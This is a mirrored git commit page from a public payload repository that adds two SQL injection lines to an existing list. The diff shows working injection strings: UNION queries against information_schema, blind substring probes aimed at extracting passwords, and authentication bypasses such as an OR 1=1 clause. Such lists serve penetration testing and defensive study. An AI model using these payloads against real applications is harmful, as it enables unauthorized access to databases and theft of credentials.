1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-09-28 19:31:56 +02:00

Added 2 working sql injection lines

This commit is contained in:
Elon Salfati 2019-06-28 18:16:45 +03:00 committed by GitHub
parent 7dda79bfc1
commit a4411ae086
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

@ -117,4 +117,5 @@
' UNION select table_schema,table_name FROM information_Schema.tables;#
admin' and substring(password/text(),1,1)='7
' and substring(password/text(),1,1)='7
' or 1=1 limit 1 -- -+
'="or'